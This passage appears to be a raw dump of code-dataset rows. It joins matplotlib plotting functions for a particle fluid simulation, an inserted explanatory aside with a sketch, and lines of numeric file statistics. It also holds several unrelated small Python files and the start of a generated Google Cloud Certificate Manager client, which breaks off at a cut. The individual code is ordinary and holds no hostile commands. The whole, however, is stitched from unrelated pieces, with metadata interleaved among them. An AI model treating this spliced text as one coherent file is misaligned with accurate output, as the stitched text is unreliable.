    vrts_fluid = np.swapaxes(vrts_fluid, 0, 1)
    cnts = part[infoTab==BOUND][:,POS]
    offs = np.ones([4,len(cnts),2])
    offs[0,:,:] = [-dr/2,-dr/2]
    offs[1,:,:] = [dr/2,-dr/2]
    offs[2,:,:] = [dr/2,dr/2]
    offs[3,:,:] = [-dr/2,dr/2]
    vrts_bound = cnts + offs
    vrts_bound = np.swapaxes(vrts_bound, 0, 1)
    #MOBILE BOUNDARIES PROPERTIES
    cnts = part[infoTab==MOBILEBOUND][:,POS]
    offs = np.ones([4,len(cnts),2])
    offs[0,:,:] = [-dr/2,-dr/2]
    offs[1,:,:] = [dr/2,-dr/2]
    offs[2,:,:] = [dr/2,dr/2]
    offs[3,:,:] = [-dr/2,dr/2]
    vrts_mobilebound = cnts + offs
    vrts_mobilebound = np.swapaxes(vrts_mobilebound, 0, 1)
    #MOBILE SOLIDS PROPERTIES
    cnts = part[infoTab==MOBILESOLID][:,POS]
    offs = np.ones([4,len(cnts),2])
    offs[0,:,:] = [-dr/2,-dr/2]
    offs[1,:,:] = [dr/2,-dr/2]
    offs[2,:,:] = [dr/2,dr/2]
    offs[3,:,:] = [-dr/2,dr/2]
    vrts_mobilesolid = cnts + offs
    vrts_mobilesolid = np.swapaxes(vrts_mobilesolid, 0, 1)
    rgb = f_color_map(partProp[infoTab==FLUID])
    # create the figure
    fig = plt.figure(PARTFIG)
    ax_list = fig.axes#check if the figure is already open else get back the subplot axes
    if len(ax_list)<1:
        ax = fig.subplots()
    else:
        ax = ax_list[0]
    coll = PolyCollection(vrts_fluid,array=None,facecolors=rgb,edgecolor='black',linewidths=0.1)
    ax.add_collection(coll)
    coll = PolyCollection(vrts_bound,array=None,facecolors='gray',edgecolor='black',linewidths=0.1)
    ax.add_collection(coll)
    coll = PolyCollection(vrts_mobilebound,array=None,facecolors='white',edgecolor='black',linewidths=0.1)
    ax.add_collection(coll)
    coll = PolyCollection(vrts_mobilesolid,array=None,facecolors='purple',edgecolor='black',linewidths=0.1)
    ax.add_collection(coll)
    ax.set_aspect('equal')
    plt.xlabel('$x$(m)',fontsize=18)
    plt.ylabel('$y$(m)',fontsize=18)
    plt.xlim(xMin,xMax)
    plt.ylim(yMin,yMax)
    plt.tight_layout()
    ax = plt.gca()
    ax.tick_params(axis = 'both', which = 'major', labelsize = 18)
    ax.xaxis.set_major_locator(plt.MaxNLocator(5))
    ax.yaxis.set_major_locator(plt.MaxNLocator(5))
    cax, _ = cbar.make_axes(ax)
    cb2 = cbar.ColorbarBase(cax, cmap=cmap,norm=normal)
    cb2.set_label(nameBar,fontsize=18)
    ax = plt.gca()
    ax.tick_params(axis = 'both', which = 'major', labelsize = 18)
    ##fig.savefig(figname,bbox_inches='tight')
    plt.show(block=False)
    plt.draw()
def particleOutline(part,partID,color,dr,PARTFIG):
    # input :
    # -part : list of particles
    # -PartID : np.array of the particles to display
    # -color : the color of the edge to outline
    # -PARTFIG : the ID of the plot
    # output :
    # -display a png image of the simulation but does not save it
    fig = plt.figure(PARTFIG)
    ax = fig.axes
    ax = ax[0]
    fluidPart = part[partID][:,POS]
    cnts = fluidPart[:]
    offs = np.ones([4,len(fluidPart),2])
    offs[0,:,:] = [-dr/2,-dr/2]
    offs[1,:,:] = [dr/2,-dr/2]
    offs[2,:,:] = [dr/2,dr/2]
    offs[3,:,:] = [-dr/2,dr/2]
    vrts_fluid = cnts + offs
    vrts_fluid = np.swapaxes(vrts_fluid, 0, 1)
    coll = PolyCollection(vrts_fluid,array=None,facecolors='none',edgecolor=color,linewidths=3)
    ax.add_collection(coll)
    plt.show(block=False)
    plt.draw()
def plotSpaces(posSpace,color,lspace,PARTFIG):
    # input :
    # -space : list of particles
    # -color : the ID of the plot
    # -PARTFIG : the ID of the plot
    # output :
    # -display a png image of the simulation but does not save it
    fig = plt.figure(PARTFIG)
    ax = fig.axes
    ax = ax[0]
    cnts = posSpace
    offs = np.ones([4,len(posSpace),2])
    offs[0,:,:] = [-lspace/2,-lspace/2]
    offs[1,:,:] = [lspace/2,-lspace/2]
    offs[2,:,:] = [lspace/2,lspace/2]
    offs[3,:,:] = [-lspace/2,lspace/2]
    vrts_space = cnts + offs
    vrts_space = np.swapaxes(vrts_space, 0, 1)
    coll = PolyCollection(vrts_space,array=None,facecolors='none',edgecolor=color,linewidths=1)
    ax.add_collection(coll)
    for i in range(len(posSpace)):
        ax.text(posSpace[i,0], posSpace[i,1],r''+repr(i), fontsize=14,horizontalalignment='center',verticalalignment='center')
    plt.show(block=False)
    plt.draw()
def spacesOutline(posSpace,color,lspace,PARTFIG):
    # input :
    # -space : list of particles
    # -color : the ID of the plot
    # -PARTFIG : the ID of the plot
    # output :
    # -display a png image of the simulation but does not save it
    fig = plt.figure(PARTFIG)
    ax = fig.axes
    ax = ax[0]
    cnts = posSpace
    offs = np.ones([4,len(posSpace),2])
    offs[0,:,:] = [-lspace/2,-lspace/2]
    offs[1,:,:] = [lspace/2,-lspace/2]
    offs[2,:,:] = [lspace/2,lspace/2]
    offs[3,:,:] = [-lspace/2,lspace/2]
    vrts_space = cnts + offs
    vrts_space = np.swapaxes(vrts_space, 0, 1)
    coll = PolyCollection(vrts_space,array=None,facecolors='none',edgecolor=color,linewidths=1)
    ax.add_collection(coll)
    plt.show(block=False)
    plt.draw()
def quiverPlot(part,sc,PARTFIG):
    # input :
    # -part : list of particles
    # -sc : scale of the vector
    # -PARTFIG : the ID of the plot
    # output :
    # -display a png image of the simulation but does not save it
    # create the figure
    fig = plt.figure(PARTFIG)
    ax_list = fig.axes#check if the figure is already open else get back the subplot axes
    if len(ax_list)<1:
        ax = fig.subplots()
    else:
        ax = ax_list[0]
    x=part[:,POS[0]]
    y=part[:,POS[1]]
    u=part[:,VEL[0]]
    v=part[:,VEL[1]]
    ax.quiver(x,y,u,v,scale=sc,scale_units='inches')
    ##fig.savefig(figname,bbox_inches='tight')
    plt.show(block=False)
    plt.draw()
def plotProperties(part,partProp,nameBar,bounds,dr,PARTFIG):
    '''
    input :
        -part : list of particles
        -partProp : array of data to display
        -nameBar : legend for the bar color
        -bounds :
            [xMin,xMax,yMin,yMax,propMin, propMax] the bound of the domain and color bar
        -PARTFIG : the ID of the plot
    output :
        -display a png image of the simulation but does not save it
    '''
    if len(bounds)==6:
        xMin = bounds[0]
        xMax = bounds[1]
        yMin = bounds[2]
        yMax = bounds[3]
        propMin = bounds[4]
        propMax = bounds[5]
    else:
        print('Error the bounds should have 6 inputs!!! check plotParticles function')
        return
    #Create a colormap
    def f_color_map(x):
        Nstep = 100
        jet = matplotlib.cm.get_cmap('jet',Nstep)
        return jet((x-propMin)/(propMax-propMin))
    cmap = plt.cm.jet
    normal = plt.Normalize(propMin,propMax) # my numbers from 0-1
    infoTab = part[:,INFO]
    cnts = part[:,POS]
    offs = np.ones([4,len(cnts),2])
    offs[0,:,:] = [-dr/2,-dr/2]
    offs[1,:,:] = [dr/2,-dr/2]
    offs[2,:,:] = [dr/2,dr/2]
    offs[3,:,:] = [-dr/2,dr/2]
    vrts_fluid = cnts + offs
    vrts_fluid = np.swapaxes(vrts_fluid, 0, 1)
    rgb = f_color_map(partProp)
    # create the figure
    fig = plt.figure(PARTFIG)
    ax_list = fig.axes#check if the figure is already open else get back the subplot axes
    if len(ax_list)<1:
        ax = fig.subplots()
    else:
        ax = ax_list[0]
    coll = PolyCollection(vrts_fluid,array=None,facecolors=rgb,edgecolor='black',linewidths=0.1)
    ax.add_collection(coll)
    ax.set_aspect('equal')
    plt.xlabel('$x$(m)',fontsize=18)
    plt.ylabel('$y$(m)',fontsize=18)
    plt.xlim(xMin,xMax)
    plt.ylim(yMin,yMax)
    plt.tight_layout()
    ax = plt.gca()
    ax.tick_params(axis = 'both', which = 'major', labelsize = 18)
    ax.xaxis.set_major_locator(plt.MaxNLocator(5))
    ax.yaxis.set_major_locator(plt.MaxNLocator(5))
    cax, _ = cbar.make_axes(ax)
    cb2 = cbar.ColorbarBase(cax, cmap=cmap,norm=normal)
    cb2.set_label(nameBar,fontsize=18)
    ax = plt.gca()
    ax.tick_params(axis = 'both', which = 'major', labelsize = 18)
    ##fig.savefig(figname,bbox_inches='tight')
    plt.show(block=False)
    plt.draw()
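The repeated cnts + offs construction above turns particle centres into four-corner squares. A standalone sketch of that pattern with synthetic centres (all names here are illustrative, not from src.sphvar):

import numpy as np
import matplotlib.pyplot as plt
from matplotlib.collections import PolyCollection

dr = 0.1                           # particle spacing
cnts = np.random.rand(50, 2)       # synthetic particle centres
offs = np.ones([4, len(cnts), 2])
offs[0, :, :] = [-dr/2, -dr/2]     # four corners of a square around each centre
offs[1, :, :] = [dr/2, -dr/2]
offs[2, :, :] = [dr/2, dr/2]
offs[3, :, :] = [-dr/2, dr/2]
vrts = np.swapaxes(cnts + offs, 0, 1)  # shape (N, 4, 2): one quad per particle
fig, ax = plt.subplots()
ax.add_collection(PolyCollection(vrts, facecolors='gray', edgecolor='black', linewidths=0.1))
ax.set_aspect('equal')
ax.autoscale_view()
plt.show()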
| 34.09589
| 120
| 0.608779
| 1,435
| 9,956
| 4.16446
| 0.150523
| 0.024096
| 0.02008
| 0.024096
| 0.792336
| 0.789993
| 0.784806
| 0.755355
| 0.755355
| 0.755355
| 0
| 0.026749
| 0.200181
| 9,956
| 291
| 121
| 34.213058
| 0.723722
| 0.206408
| 0
| 0.78673
| 0
| 0
| 0.040373
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037915
| false
| 0
| 0.047393
| 0
| 0.104265
| 0.009479
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
eb61d5fdfb12e586a386651c6c1770f6553c5461
| 89
|
py
|
Python
|
docsie_universal_importer/providers/dropbox/__init__.py
|
Zarif99/test-universal
|
062972ed64d9f048de702ab1edf4025cffca2abb
|
[
"BSD-3-Clause"
] | null | null | null |
docsie_universal_importer/providers/dropbox/__init__.py
|
Zarif99/test-universal
|
062972ed64d9f048de702ab1edf4025cffca2abb
|
[
"BSD-3-Clause"
] | 16
|
2021-06-16T15:00:41.000Z
|
2021-06-30T11:57:15.000Z
|
docsie_universal_importer/providers/dropbox/__init__.py
|
Zarif99/test-universal
|
062972ed64d9f048de702ab1edf4025cffca2abb
|
[
"BSD-3-Clause"
] | 1
|
2021-11-17T19:24:45.000Z
|
2021-11-17T19:24:45.000Z
|
default_app_config = 'docsie_universal_importer.providers.dropbox.apps.DropboxAppConfig'
| 44.5
| 88
| 0.88764
| 10
| 89
| 7.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033708
| 89
| 1
| 89
| 89
| 0.872093
| 0
| 0
| 0
| 0
| 0
| 0.730337
| 0.730337
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ebcda36ca8928425705f7e76b2bc429a4f48e6da
| 162
|
py
|
Python
|
src/analysis/__init__.py
|
gchhablani/DRIFT
|
8d748998b695489a40ff732a974e4b1f915bab34
|
[
"MIT"
] | 90
|
2021-07-01T15:42:57.000Z
|
2021-12-06T04:57:59.000Z
|
src/analysis/__init__.py
|
gchhablani/DRIFT
|
8d748998b695489a40ff732a974e4b1f915bab34
|
[
"MIT"
] | 8
|
2021-07-02T12:41:13.000Z
|
2021-08-08T17:59:30.000Z
|
src/analysis/__init__.py
|
gchhablani/DRIFT
|
8d748998b695489a40ff732a974e4b1f915bab34
|
[
"MIT"
] | 7
|
2021-07-01T13:08:14.000Z
|
2021-08-29T05:29:09.000Z
|
from .leap2trend import *
from .semantic_drift import *
from .similarity_acc_matrix import *
from .topic_extraction_lda import *
from .tracking_clusters import *
| 27
| 36
| 0.814815
| 21
| 162
| 6
| 0.619048
| 0.31746
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007042
| 0.123457
| 162
| 5
| 37
| 32.4
| 0.880282
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ccf8da78fff1e13984fb722a82c6b833a49cb466
| 66
|
py
|
Python
|
app.py
|
mjcarleb/pet_blog
|
9db1914b2aa7af9d258ca2f2bd41b260b238c256
|
[
"MIT"
] | null | null | null |
app.py
|
mjcarleb/pet_blog
|
9db1914b2aa7af9d258ca2f2bd41b260b238c256
|
[
"MIT"
] | null | null | null |
app.py
|
mjcarleb/pet_blog
|
9db1914b2aa7af9d258ca2f2bd41b260b238c256
|
[
"MIT"
] | null | null | null |
from puppycompanyblog import app
def create_app():
    return app
| 16.5
| 32
| 0.772727
| 9
| 66
| 5.555556
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 66
| 4
| 33
| 16.5
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 6
|
690729a8e84ab99b40515f35cca05f76af37aa2f
| 72
|
py
|
Python
|
tests/data/format/no_changes/multi_line_variables.py
|
DanielNoord/pydocstringformatter
|
a69302cee6bd32b9b5cc48912a47d0e8ad3f7abe
|
[
"MIT"
] | 4
|
2022-01-02T22:50:59.000Z
|
2022-02-09T09:04:37.000Z
|
tests/data/format/no_changes/multi_line_variables.py
|
DanielNoord/pydocstringformatter
|
a69302cee6bd32b9b5cc48912a47d0e8ad3f7abe
|
[
"MIT"
] | 80
|
2022-01-02T09:02:50.000Z
|
2022-03-30T13:34:10.000Z
|
tests/data/format/no_changes/multi_line_variables.py
|
DanielNoord/pydocstringformatter
|
a69302cee6bd32b9b5cc48912a47d0e8ad3f7abe
|
[
"MIT"
] | 2
|
2022-01-02T11:58:29.000Z
|
2022-01-04T18:53:29.000Z
|
var = """A multi-line
docstring"""
var = """A multi-line
docstring
"""
| 10.285714
| 21
| 0.611111
| 10
| 72
| 4.4
| 0.5
| 0.181818
| 0.409091
| 0.590909
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 72
| 6
| 22
| 12
| 0.733333
| 0
| 0
| 0.4
| 0
| 0
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
69682a67df863cb3aa2e163a6aa3fb36251c2dbe
| 32
|
py
|
Python
|
queso/cli/__init__.py
|
bocadilloproject/boca
|
b477ac4de5102ce56798b95d77f4eae3e4f08bb6
|
[
"MIT"
] | 4
|
2019-01-20T14:20:18.000Z
|
2019-02-13T02:36:00.000Z
|
queso/cli/__init__.py
|
bocadilloproject/queso
|
b477ac4de5102ce56798b95d77f4eae3e4f08bb6
|
[
"MIT"
] | 2
|
2019-03-09T16:55:26.000Z
|
2019-04-20T09:42:09.000Z
|
queso/cli/__init__.py
|
bocadilloproject/queso
|
b477ac4de5102ce56798b95d77f4eae3e4f08bb6
|
[
"MIT"
] | null | null | null |
from .factory import create_cli
| 16
| 31
| 0.84375
| 5
| 32
| 5.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 32
| 1
| 32
| 32
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
15daad6da8b567efe639be6c415a5291c7ac5159
| 119,544
|
py
|
Python
|
google/cloud/certificate_manager_v1/services/certificate_manager/client.py
|
renovate-bot/python-certificatemanager
|
8e93056d8ccbd6f2fe6f5f8346ad28c104a8b688
|
[
"Apache-2.0"
] | 1
|
2022-02-22T03:49:14.000Z
|
2022-02-22T03:49:14.000Z
|
google/cloud/certificate_manager_v1/services/certificate_manager/client.py
|
renovate-bot/python-certificatemanager
|
8e93056d8ccbd6f2fe6f5f8346ad28c104a8b688
|
[
"Apache-2.0"
] | 9
|
2022-02-16T16:39:24.000Z
|
2022-03-30T13:17:14.000Z
|
google/cloud/certificate_manager_v1/services/certificate_manager/client.py
|
renovate-bot/python-certificatemanager
|
8e93056d8ccbd6f2fe6f5f8346ad28c104a8b688
|
[
"Apache-2.0"
] | 1
|
2022-02-16T15:27:03.000Z
|
2022-02-16T15:27:03.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import os
import re
from typing import Dict, Mapping, Optional, Sequence, Tuple, Type, Union
from google.api_core import client_options as client_options_lib
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.oauth2 import service_account # type: ignore
import pkg_resources
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.api_core import operation # type: ignore
from google.api_core import operation_async # type: ignore
from google.protobuf import empty_pb2 # type: ignore
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
from google.cloud.certificate_manager_v1.services.certificate_manager import pagers
from google.cloud.certificate_manager_v1.types import certificate_manager
from .transports.base import DEFAULT_CLIENT_INFO, CertificateManagerTransport
from .transports.grpc import CertificateManagerGrpcTransport
from .transports.grpc_asyncio import CertificateManagerGrpcAsyncIOTransport
class CertificateManagerClientMeta(type):
"""Metaclass for the CertificateManager client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[CertificateManagerTransport]]
_transport_registry["grpc"] = CertificateManagerGrpcTransport
_transport_registry["grpc_asyncio"] = CertificateManagerGrpcAsyncIOTransport
def get_transport_class(
cls,
label: str = None,
) -> Type[CertificateManagerTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
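# Added illustration (assumes only the registry defined above): because the
# metaclass exposes get_transport_class on the class itself, a transport can
# be resolved without instantiating a client:
#
#   transport_cls = CertificateManagerClient.get_transport_class("grpc_asyncio")
#   # -> CertificateManagerGrpcAsyncIOTransport
#   CertificateManagerClient.get_transport_class()
#   # -> CertificateManagerGrpcTransport, the first registered entry, since
#   #    OrderedDict preserves insertion order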
class CertificateManagerClient(metaclass=CertificateManagerClientMeta):
"""API Overview
Certificates Manager API allows customers to see and manage all
their TLS certificates.
Certificates Manager API service provides methods to manage
certificates, group them into collections, and create serving
configuration that can be easily applied to other Cloud resources
e.g. Target Proxies.
Data Model
The Certificates Manager service exposes the following resources:
- ``Certificate`` which describes a single TLS certificate.
- ``CertificateMap`` which describes a collection of certificates
that can be attached to a target resource.
- ``CertificateMapEntry`` which describes a single configuration
entry that consists of a SNI and a group of certificates. It's a
subresource of CertificateMap.
Certificate, CertificateMap and CertificateMapEntry IDs have to
match "^[a-z0-9-]{1,63}$" regexp, which means that
- only lower case letters, digits, and hyphen are allowed
- length of the resource ID has to be in [1,63] range.
Provides methods to manage Cloud Certificate Manager entities.
"""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
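# Worked examples (added for illustration; endpoints other than the default
# are hypothetical):
#   _get_default_mtls_endpoint("certificatemanager.googleapis.com")
#   # -> "certificatemanager.mtls.googleapis.com"
#   _get_default_mtls_endpoint("foo.sandbox.googleapis.com")
#   # -> "foo.mtls.sandbox.googleapis.com"
#   _get_default_mtls_endpoint("foo.mtls.googleapis.com")
#   # -> unchanged: the endpoint is already mTLS
#   _get_default_mtls_endpoint("example.com")
#   # -> unchanged: not a googleapis.com domain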
DEFAULT_ENDPOINT = "certificatemanager.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
CertificateManagerClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
CertificateManagerClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
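# Hedged usage sketch (added; the key file path is hypothetical):
#
#   client = CertificateManagerClient.from_service_account_file(
#       "service-account.json"
#   )
#
# Both alternate constructors simply build service_account.Credentials and
# forward them to cls(...) via the `credentials` keyword argument.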
@property
def transport(self) -> CertificateManagerTransport:
"""Returns the transport used by the client instance.
Returns:
CertificateManagerTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def certificate_path(
project: str,
location: str,
certificate: str,
) -> str:
"""Returns a fully-qualified certificate string."""
return (
"projects/{project}/locations/{location}/certificates/{certificate}".format(
project=project,
location=location,
certificate=certificate,
)
)
@staticmethod
def parse_certificate_path(path: str) -> Dict[str, str]:
"""Parses a certificate path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/certificates/(?P<certificate>.+?)$",
path,
)
return m.groupdict() if m else {}
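# Added illustration: the path builders and parsers are inverses (argument
# values here are hypothetical):
#
#   p = CertificateManagerClient.certificate_path("my-proj", "us-central1", "my-cert")
#   # -> "projects/my-proj/locations/us-central1/certificates/my-cert"
#   CertificateManagerClient.parse_certificate_path(p)
#   # -> {"project": "my-proj", "location": "us-central1", "certificate": "my-cert"}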
@staticmethod
def certificate_map_path(
project: str,
location: str,
certificate_map: str,
) -> str:
"""Returns a fully-qualified certificate_map string."""
return "projects/{project}/locations/{location}/certificateMaps/{certificate_map}".format(
project=project,
location=location,
certificate_map=certificate_map,
)
@staticmethod
def parse_certificate_map_path(path: str) -> Dict[str, str]:
"""Parses a certificate_map path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/certificateMaps/(?P<certificate_map>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def certificate_map_entry_path(
project: str,
location: str,
certificate_map: str,
certificate_map_entry: str,
) -> str:
"""Returns a fully-qualified certificate_map_entry string."""
return "projects/{project}/locations/{location}/certificateMaps/{certificate_map}/certificateMapEntries/{certificate_map_entry}".format(
project=project,
location=location,
certificate_map=certificate_map,
certificate_map_entry=certificate_map_entry,
)
@staticmethod
def parse_certificate_map_entry_path(path: str) -> Dict[str, str]:
"""Parses a certificate_map_entry path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/certificateMaps/(?P<certificate_map>.+?)/certificateMapEntries/(?P<certificate_map_entry>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def dns_authorization_path(
project: str,
location: str,
dns_authorization: str,
) -> str:
"""Returns a fully-qualified dns_authorization string."""
return "projects/{project}/locations/{location}/dnsAuthorizations/{dns_authorization}".format(
project=project,
location=location,
dns_authorization=dns_authorization,
)
@staticmethod
def parse_dns_authorization_path(path: str) -> Dict[str, str]:
"""Parses a dns_authorization path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/dnsAuthorizations/(?P<dns_authorization>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def target_https_proxies_path(
project: str,
location: str,
target_https_proxy: str,
) -> str:
"""Returns a fully-qualified target_https_proxies string."""
return "projects/{project}/locations/{location}/targetHttpsProxies/{target_https_proxy}".format(
project=project,
location=location,
target_https_proxy=target_https_proxy,
)
@staticmethod
def parse_target_https_proxies_path(path: str) -> Dict[str, str]:
"""Parses a target_https_proxies path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/targetHttpsProxies/(?P<target_https_proxy>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def target_ssl_proxies_path(
project: str,
location: str,
target_ssl_proxy: str,
) -> str:
"""Returns a fully-qualified target_ssl_proxies string."""
return "projects/{project}/locations/{location}/targetSslProxies/{target_ssl_proxy}".format(
project=project,
location=location,
target_ssl_proxy=target_ssl_proxy,
)
@staticmethod
def parse_target_ssl_proxies_path(path: str) -> Dict[str, str]:
"""Parses a target_ssl_proxies path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/targetSslProxies/(?P<target_ssl_proxy>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(
billing_account: str,
) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(
folder: str,
) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(
folder=folder,
)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(
organization: str,
) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(
organization=organization,
)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(
project: str,
) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(
project=project,
)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(
project: str,
location: str,
) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project,
location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
@classmethod
